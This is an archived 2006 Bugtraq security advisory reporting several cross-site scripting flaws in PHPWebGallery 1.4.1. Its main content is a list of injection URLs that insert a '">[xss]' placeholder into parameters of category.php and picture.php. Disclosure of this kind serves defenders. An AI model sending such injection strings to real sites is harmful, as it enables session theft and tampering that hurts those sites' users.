The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


PHPWebGallery Multiple Cross Site Scripting Vulnerabilities


<< Previous INDEX Search src / Print Next >>
Date: 10 Apr 2006 10:12:17 -0000
From: root__@linuxmail.org
To: bugtraq@securityfocus.com
Subject: PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru

Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Author: Mourad aka Psych0 <root__ at linuxmail org>
Moroccan Security Team
Vendor: www.phpwebgallery.net
Software: PHPWebGallery
Version:  1.4.1

category.php and picture.php scripts are vulnerable to XSS attacks.

Exploits:

http://target/phpwebgallery_dir/category.php?cat=">[xss]

http://target/phpwebgallery_dir/category.php?cat=">[xss]&num=0

http://target/phpwebgallery_dir/category.php?cat=1&num=">[xss]

http://target/phpwebgallery_dir/category.php?cat=">[xss]&search=date_available%3A2006-01-01

http://target/phpwebgallery_dir/category.php?cat=1&search=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss]

http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss]


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру